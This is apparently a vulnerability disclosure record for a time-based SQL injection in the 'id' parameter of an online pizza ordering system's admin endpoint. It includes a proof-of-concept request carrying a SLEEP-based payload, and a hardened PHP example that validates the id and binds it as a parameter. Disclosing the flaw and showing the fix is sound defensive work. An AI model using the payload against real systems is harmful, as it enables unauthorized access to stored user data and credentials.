Submit #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'

Title: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'

Description:

Affected Software: SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On: Ubuntu Server 22.04.3 LTS

Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Request:

    POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
    Host: x.x.x.x
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 5
    Origin: http://x.x.x.x
    Connection: close
    Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
    Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

    id=1

Affected Parameter: id

Proof of Concept:

    POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
    Host: x.x.x.x
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 5
    Origin: http://x.x.x.x
    Connection: close
    Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
    Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

    id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)

Impact: SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.

Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.

User: simon.davis8080 (ID 54983)
Submission: 10/05/2023 10:30 (8 months ago)
Moderation: 10/05/2023 12:01 (2 hours later)
Status: Accepted
VulDB Entry: 241384
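
A hardened form of a handler like the one the report describes, as an added example that is not code from the report or from the SourceCodester project: the 'id' value is validated as a positive integer and then bound as a typed parameter instead of being placed in the SQL text. The PDO/SQLite setup, the function names, and the orders table with its status column are assumptions made so the example runs offline; the application's real schema and database layer are not shown in the report.

```php
<?php
// Added example. Table and column names (orders, status) are hypothetical;
// the application's real schema is not shown in the report.

function parse_order_id($raw): ?int
{
    // Accept only a positive base-10 integer; anything else is rejected
    // before it gets near the database.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function confirm_order(PDO $db, $rawId): bool
{
    $id = parse_order_id($rawId);
    if ($id === null) {
        return false;
    }
    // The id is bound as a typed parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('UPDATE orders SET status = 1 WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Constructed demo data in an in-memory SQLite database (assumption, offline only).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE orders (id INTEGER PRIMARY KEY, status INTEGER NOT NULL DEFAULT 0)');
$db->exec('INSERT INTO orders (id, status) VALUES (1, 0)');

$inputs = [
    '1',                                                 // request body value from the report
    '1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)',  // PoC value from the report
    '',                                                  // missing parameter
];
foreach ($inputs as $raw) {
    $result = confirm_order($db, $raw) ? 'confirmed' : 'rejected';
    printf("%-55s => %s\n", var_export($raw, true), $result);
}
```

Either control alone would stop the reported input; the integer check also gives the handler a clean rejection path that can be logged.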
